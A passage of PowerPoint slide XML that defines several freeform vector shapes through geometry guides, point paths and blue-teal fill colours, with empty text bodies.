                <a:off x="1378" y="2372"/>
                <a:ext cx="57" cy="26"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 6 w 57"/>
                  <a:gd name="T1" fmla="*/ 26 h 26"/>
                  <a:gd name="T2" fmla="*/ 57 w 57"/>
                  <a:gd name="T3" fmla="*/ 11 h 26"/>
                  <a:gd name="T4" fmla="*/ 25 w 57"/>
                  <a:gd name="T5" fmla="*/ 0 h 26"/>
                  <a:gd name="T6" fmla="*/ 0 w 57"/>
                  <a:gd name="T7" fmla="*/ 4 h 26"/>
                  <a:gd name="T8" fmla="*/ 0 w 57"/>
                  <a:gd name="T9" fmla="*/ 25 h 26"/>
                  <a:gd name="T10" fmla="*/ 6 w 57"/>
                  <a:gd name="T11" fmla="*/ 26 h 26"/>
                  <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T15" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T16" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T17" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T18" fmla="*/ 0 w 57"/>
                  <a:gd name="T19" fmla="*/ 0 h 26"/>
                  <a:gd name="T20" fmla="*/ 57 w 5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7" h="26">
                    <a:moveTo>
                      <a:pt x="6" y="26"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="57" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="26"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="001999"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10734" name="Freeform 141"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1227" y="2261"/>
                <a:ext cx="32" cy="124"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 32 w 32"/>
                  <a:gd name="T1" fmla="*/ 4 h 124"/>
                  <a:gd name="T2" fmla="*/ 32 w 32"/>
                  <a:gd name="T3" fmla="*/ 3 h 124"/>
                  <a:gd name="T4" fmla="*/ 31 w 32"/>
                  <a:gd name="T5" fmla="*/ 3 h 124"/>
                  <a:gd name="T6" fmla="*/ 31 w 32"/>
                  <a:gd name="T7" fmla="*/ 3 h 124"/>
                  <a:gd name="T8" fmla="*/ 29 w 32"/>
                  <a:gd name="T9" fmla="*/ 3 h 124"/>
                  <a:gd name="T10" fmla="*/ 27 w 32"/>
                  <a:gd name="T11" fmla="*/ 2 h 124"/>
                  <a:gd name="T12" fmla="*/ 26 w 32"/>
                  <a:gd name="T13" fmla="*/ 2 h 124"/>
                  <a:gd name="T14" fmla="*/ 24 w 32"/>
                  <a:gd name="T15" fmla="*/ 0 h 124"/>
                  <a:gd name="T16" fmla="*/ 22 w 32"/>
                  <a:gd name="T17" fmla="*/ 0 h 124"/>
                  <a:gd name="T18" fmla="*/ 20 w 32"/>
                  <a:gd name="T19" fmla="*/ 0 h 124"/>
                  <a:gd name="T20" fmla="*/ 18 w 32"/>
                  <a:gd name="T21" fmla="*/ 0 h 124"/>
                  <a:gd name="T22" fmla="*/ 14 w 32"/>
                  <a:gd name="T23" fmla="*/ 0 h 124"/>
                  <a:gd name="T24" fmla="*/ 12 w 32"/>
                  <a:gd name="T25" fmla="*/ 2 h 124"/>
                  <a:gd name="T26" fmla="*/ 10 w 32"/>
                  <a:gd name="T27" fmla="*/ 2 h 124"/>
                  <a:gd name="T28" fmla="*/ 6 w 32"/>
                  <a:gd name="T29" fmla="*/ 3 h 124"/>
                  <a:gd name="T30" fmla="*/ 4 w 32"/>
                  <a:gd name="T31" fmla="*/ 4 h 124"/>
                  <a:gd name="T32" fmla="*/ 0 w 32"/>
                  <a:gd name="T33" fmla="*/ 6 h 124"/>
                  <a:gd name="T34" fmla="*/ 0 w 32"/>
                  <a:gd name="T35" fmla="*/ 124 h 124"/>
                  <a:gd name="T36" fmla="*/ 1 w 32"/>
                  <a:gd name="T37" fmla="*/ 124 h 124"/>
                  <a:gd name="T38" fmla="*/ 1 w 32"/>
                  <a:gd name="T39" fmla="*/ 124 h 124"/>
                  <a:gd name="T40" fmla="*/ 3 w 32"/>
                  <a:gd name="T41" fmla="*/ 124 h 124"/>
                  <a:gd name="T42" fmla="*/ 4 w 32"/>
                  <a:gd name="T43" fmla="*/ 124 h 124"/>
                  <a:gd name="T44" fmla="*/ 5 w 32"/>
                  <a:gd name="T45" fmla="*/ 123 h 124"/>
                  <a:gd name="T46" fmla="*/ 7 w 32"/>
                  <a:gd name="T47" fmla="*/ 123 h 124"/>
                  <a:gd name="T48" fmla="*/ 8 w 32"/>
                  <a:gd name="T49" fmla="*/ 123 h 124"/>
                  <a:gd name="T50" fmla="*/ 11 w 32"/>
                  <a:gd name="T51" fmla="*/ 122 h 124"/>
                  <a:gd name="T52" fmla="*/ 13 w 32"/>
                  <a:gd name="T53" fmla="*/ 122 h 124"/>
                  <a:gd name="T54" fmla="*/ 15 w 32"/>
                  <a:gd name="T55" fmla="*/ 121 h 124"/>
                  <a:gd name="T56" fmla="*/ 18 w 32"/>
                  <a:gd name="T57" fmla="*/ 120 h 124"/>
                  <a:gd name="T58" fmla="*/ 21 w 32"/>
                  <a:gd name="T59" fmla="*/ 118 h 124"/>
                  <a:gd name="T60" fmla="*/ 24 w 32"/>
                  <a:gd name="T61" fmla="*/ 117 h 124"/>
                  <a:gd name="T62" fmla="*/ 26 w 32"/>
                  <a:gd name="T63" fmla="*/ 116 h 124"/>
                  <a:gd name="T64" fmla="*/ 29 w 32"/>
                  <a:gd name="T65" fmla="*/ 114 h 124"/>
                  <a:gd name="T66" fmla="*/ 32 w 32"/>
                  <a:gd name="T67" fmla="*/ 113 h 124"/>
                  <a:gd name="T68" fmla="*/ 32 w 32"/>
                  <a:gd name="T69" fmla="*/ 4 h 1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
                  <a:gd name="T106" fmla="*/ 0 h 124"/>
                  <a:gd name="T107" fmla="*/ 32 w 32"/>
                  <a:gd name="T108" fmla="*/ 124 h 1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 h="124">
                    <a:moveTo>
                      <a:pt x="32" y="4"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="32" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="4"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="7FBFBF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10735" name="Freeform 142"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1228" y="2263"/>
                <a:ext cx="27" cy="104"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 27 w 27"/>
                  <a:gd name="T1" fmla="*/ 2 h 104"/>
                  <a:gd name="T2" fmla="*/ 27 w 27"/>
                  <a:gd name="T3" fmla="*/ 2 h 104"/>
                  <a:gd name="T4" fmla="*/ 26 w 27"/>
                  <a:gd name="T5" fmla="*/ 2 h 104"/>
                  <a:gd name="T6" fmla="*/ 26 w 27"/>
                  <a:gd name="T7" fmla="*/ 2 h 104"/>
                  <a:gd name="T8" fmla="*/ 25 w 27"/>
                  <a:gd name="T9" fmla="*/ 1 h 104"/>
                  <a:gd name="T10" fmla="*/ 24 w 27"/>
                  <a:gd name="T11" fmla="*/ 1 h 104"/>
                  <a:gd name="T12" fmla="*/ 23 w 27"/>
                  <a:gd name="T13" fmla="*/ 0 h 104"/>
                  <a:gd name="T14" fmla="*/ 20 w 27"/>
                  <a:gd name="T15" fmla="*/ 0 h 104"/>
                  <a:gd name="T16" fmla="*/ 19 w 27"/>
                  <a:gd name="T17" fmla="*/ 0 h 104"/>
                  <a:gd name="T18" fmla="*/ 17 w 27"/>
                  <a:gd name="T19" fmla="*/ 0 h 104"/>
                  <a:gd name="T20" fmla="*/ 14 w 27"/>
                  <a:gd name="T21" fmla="*/ 0 h 104"/>
                  <a:gd name="T22" fmla="*/ 12 w 27"/>
                  <a:gd name="T23" fmla="*/ 0 h 104"/>
                  <a:gd name="T24" fmla="*/ 10 w 27"/>
                  <a:gd name="T25" fmla="*/ 0 h 104"/>
                  <a:gd name="T26" fmla="*/ 9 w 27"/>
                  <a:gd name="T27" fmla="*/ 1 h 104"/>
                  <a:gd name="T28" fmla="*/ 5 w 27"/>
                  <a:gd name="T29" fmla="*/ 2 h 104"/>
                  <a:gd name="T30" fmla="*/ 3 w 27"/>
                  <a:gd name="T31" fmla="*/ 3 h 104"/>
                  <a:gd name="T32" fmla="*/ 0 w 27"/>
                  <a:gd name="T33" fmla="*/ 4 h 104"/>
                  <a:gd name="T34" fmla="*/ 0 w 27"/>
                  <a:gd name="T35" fmla="*/ 104 h 104"/>
                  <a:gd name="T36" fmla="*/ 0 w 27"/>
                  <a:gd name="T37" fmla="*/ 104 h 104"/>
                  <a:gd name="T38" fmla="*/ 2 w 27"/>
                  <a:gd name="T39" fmla="*/ 104 h 104"/>
                  <a:gd name="T40" fmla="*/ 2 w 27"/>
                  <a:gd name="T41" fmla="*/ 104 h 104"/>
                  <a:gd name="T42" fmla="*/ 3 w 27"/>
                  <a:gd name="T43" fmla="*/ 104 h 104"/>
                  <a:gd name="T44" fmla="*/ 4 w 27"/>
                  <a:gd name="T45" fmla="*/ 104 h 104"/>
                  <a:gd name="T46" fmla="*/ 6 w 27"/>
                  <a:gd name="T47" fmla="*/ 104 h 104"/>
                  <a:gd name="T48" fmla="*/ 7 w 27"/>
                  <a:gd name="T49" fmla="*/ 102 h 104"/>
                  <a:gd name="T50" fmla="*/ 10 w 27"/>
                  <a:gd name="T51" fmla="*/ 102 h 104"/>
                  <a:gd name="T52" fmla="*/ 11 w 27"/>
                  <a:gd name="T53" fmla="*/ 101 h 104"/>
                  <a:gd name="T54" fmla="*/ 13 w 27"/>
                  <a:gd name="T55" fmla="*/ 101 h 104"/>
                  <a:gd name="T56" fmla="*/ 16 w 27"/>
                  <a:gd name="T57" fmla="*/ 100 h 104"/>
                  <a:gd name="T58" fmla="*/ 18 w 27"/>
                  <a:gd name="T59" fmla="*/ 99 h 104"/>
                  <a:gd name="T60" fmla="*/ 20 w 27"/>
                  <a:gd name="T61" fmla="*/ 98 h 104"/>
                  <a:gd name="T62" fmla="*/ 23 w 27"/>
                  <a:gd name="T63" fmla="*/ 97 h 104"/>
                  <a:gd name="T64" fmla="*/ 25 w 27"/>
                  <a:gd name="T65" fmla="*/ 95 h 104"/>
                  <a:gd name="T66" fmla="*/ 27 w 27"/>
                  <a:gd name="T67" fmla="*/ 93 h 104"/>
                  <a:gd name="T68" fmla="*/ 27 w 27"/>
                  <a:gd name="T69" fmla="*/ 2 h 1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
                  <a:gd name="T106" fmla="*/ 0 h 104"/>
                  <a:gd name="T107" fmla="*/ 27 w 27"/>
                  <a:gd name="T108" fmla="*/ 104 h 10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 h="104">
                    <a:moveTo>
                      <a:pt x="27" y="2"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="27" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="2"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="93CCCC"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10736" name="Freeform 143"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1230" y="2264"/>
                <a:ext cx="22" cy="84"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 22 w 22"/>
                  <a:gd name="T1" fmla="*/ 2 h 84"/>
                  <a:gd name="T2" fmla="*/ 22 w 22"/>
                  <a:gd name="T3" fmla="*/ 2 h 84"/>
                  <a:gd name="T4" fmla="*/ 21 w 22"/>
                  <a:gd name="T5" fmla="*/ 1 h 84"/>
                  <a:gd name="T6" fmla="*/ 21 w 22"/>
                  <a:gd name="T7" fmla="*/ 1 h 84"/>
                  <a:gd name="T8" fmla="*/ 19 w 22"/>
                  <a:gd name="T9" fmla="*/ 1 h 84"/>
                  <a:gd name="T10" fmla="*/ 18 w 22"/>
                  <a:gd name="T11" fmla="*/ 1 h 84"/>
                  <a:gd name="T12" fmla="*/ 17 w 22"/>
                  <a:gd name="T13" fmla="*/ 0 h 84"/>
                  <a:gd name="T14" fmla="*/ 16 w 22"/>
                  <a:gd name="T15" fmla="*/ 0 h 84"/>
                  <a:gd name="T16" fmla="*/ 15 w 22"/>
                  <a:gd name="T17" fmla="*/ 0 h 84"/>
                  <a:gd name="T18" fmla="*/ 14 w 22"/>
                  <a:gd name="T19" fmla="*/ 0 h 84"/>
                  <a:gd name="T20" fmla="*/ 11 w 22"/>
                  <a:gd name="T21" fmla="*/ 0 h 84"/>
                  <a:gd name="T22" fmla="*/ 9 w 22"/>
                  <a:gd name="T23" fmla="*/ 0 h 84"/>
                  <a:gd name="T24" fmla="*/ 8 w 22"/>
                  <a:gd name="T25" fmla="*/ 0 h 84"/>
                  <a:gd name="T26" fmla="*/ 5 w 22"/>
                  <a:gd name="T27" fmla="*/ 1 h 84"/>
                  <a:gd name="T28" fmla="*/ 3 w 22"/>
                  <a:gd name="T29" fmla="*/ 1 h 84"/>
                  <a:gd name="T30" fmla="*/ 2 w 22"/>
                  <a:gd name="T31" fmla="*/ 2 h 84"/>
                  <a:gd name="T32" fmla="*/ 0 w 22"/>
                  <a:gd name="T33" fmla="*/ 3 h 84"/>
                  <a:gd name="T34" fmla="*/ 0 w 22"/>
                  <a:gd name="T35" fmla="*/ 84 h 84"/>
                  <a:gd name="T36" fmla="*/ 0 w 22"/>
                  <a:gd name="T37" fmla="*/ 84 h 84"/>
                  <a:gd name="T38" fmla="*/ 0 w 22"/>
                  <a:gd name="T39" fmla="*/ 84 h 84"/>
                  <a:gd name="T40" fmla="*/ 1 w 22"/>
                  <a:gd name="T41" fmla="*/ 84 h 84"/>
                  <a:gd name="T42" fmla="*/ 2 w 22"/>
                  <a:gd name="T43" fmla="*/ 84 h 84"/>
                  <a:gd name="T44" fmla="*/ 3 w 22"/>
                  <a:gd name="T45" fmla="*/ 84 h 84"/>
                  <a:gd name="T46" fmla="*/ 4 w 22"/>
                  <a:gd name="T47" fmla="*/ 84 h 84"/>
                  <a:gd name="T48" fmla="*/ 5 w 22"/>
                  <a:gd name="T49" fmla="*/ 84 h 84"/>
                  <a:gd name="T50" fmla="*/ 7 w 22"/>
                  <a:gd name="T51" fmla="*/ 83 h 84"/>
                  <a:gd name="T52" fmla="*/ 9 w 22"/>
                  <a:gd name="T53" fmla="*/ 83 h 84"/>
                  <a:gd name="T54" fmla="*/ 10 w 22"/>
                  <a:gd name="T55" fmla="*/ 82 h 84"/>
                  <a:gd name="T56" fmla="*/ 12 w 22"/>
                  <a:gd name="T57" fmla="*/ 82 h 84"/>
                  <a:gd name="T58" fmla="*/ 14 w 22"/>
                  <a:gd name="T59" fmla="*/ 80 h 84"/>
                  <a:gd name="T60" fmla="*/ 16 w 22"/>
                  <a:gd name="T61" fmla="*/ 79 h 84"/>
                  <a:gd name="T62" fmla="*/ 18 w 22"/>
                  <a:gd name="T63" fmla="*/ 78 h 84"/>
                  <a:gd name="T64" fmla="*/ 19 w 22"/>
                  <a:gd name="T65" fmla="*/ 77 h 84"/>
                  <a:gd name="T66" fmla="*/ 22 w 22"/>
                  <a:gd name="T67" fmla="*/ 76 h 84"/>
                  <a:gd name="T68" fmla="*/ 22 w 22"/>
                  <a:gd name="T69" fmla="*/ 2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
                  <a:gd name="T106" fmla="*/ 0 h 84"/>
                  <a:gd name="T107" fmla="*/ 22 w 22"/>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 h="84">
                    <a:moveTo>
                      <a:pt x="22" y="2"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="22" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="2"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="A8D8D8"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10737" name="Freeform 144"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1231" y="2265"/>
                <a:ext cx="17" cy="65"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 17 w 17"/>
                  <a:gd name="T1" fmla="*/ 1 h 65"/>
                  <a:gd name="T2" fmla="*/ 17 w 17"/>
                  <a:gd name="T3" fmla="*/ 1 h 65"/>
                  <a:gd name="T4" fmla="*/ 16 w 17"/>
                  <a:gd name="T5" fmla="*/ 1 h 65"/>
                  <a:gd name="T6" fmla="*/ 14 w 17"/>
                  <a:gd name="T7" fmla="*/ 0 h 65"/>
                  <a:gd name="T8" fmla="*/ 11 w 17"/>
                  <a:gd name="T9" fmla="*/ 0 h 65"/>
                  <a:gd name="T10" fmla="*/ 9 w 17"/>
                  <a:gd name="T11" fmla="*/ 0 h 65"/>
                  <a:gd name="T12" fmla="*/ 6 w 17"/>
                  <a:gd name="T13" fmla="*/ 0 h 65"/>
                  <a:gd name="T14" fmla="*/ 2 w 17"/>
                  <a:gd name="T15" fmla="*/ 1 h 65"/>
                  <a:gd name="T16" fmla="*/ 0 w 17"/>
                  <a:gd name="T17" fmla="*/ 2 h 65"/>
                  <a:gd name="T18" fmla="*/ 0 w 17"/>
                  <a:gd name="T19" fmla="*/ 65 h 65"/>
                  <a:gd name="T20" fmla="*/ 0 w 17"/>
                  <a:gd name="T21" fmla="*/ 65 h 65"/>
                  <a:gd name="T22" fmla="*/ 1 w 17"/>
                  <a:gd name="T23" fmla="*/ 65 h 65"/>
                  <a:gd name="T24" fmla="*/ 3 w 17"/>
                  <a:gd name="T25" fmla="*/ 64 h 65"/>
                  <a:gd name="T26" fmla="*/ 6 w 17"/>
                  <a:gd name="T27" fmla="*/ 64 h 65"/>
                  <a:gd name="T28" fmla="*/ 8 w 17"/>
                  <a:gd name="T29" fmla="*/ 63 h 65"/>
                  <a:gd name="T30" fmla="*/ 11 w 17"/>
                  <a:gd name="T31" fmla="*/ 62 h 65"/>
                  <a:gd name="T32" fmla="*/ 14 w 17"/>
                  <a:gd name="T33" fmla="*/ 61 h 65"/>
                  <a:gd name="T34" fmla="*/ 17 w 17"/>
                  <a:gd name="T35" fmla="*/ 58 h 65"/>
                  <a:gd name="T36" fmla="*/ 17 w 17"/>
                  <a:gd name="T37" fmla="*/ 1 h 6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65"/>
                  <a:gd name="T59" fmla="*/ 17 w 17"/>
                  <a:gd name="T60" fmla="*/ 65 h 6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65">
                    <a:moveTo>
                      <a:pt x="17" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="1"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="BCE5E5"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
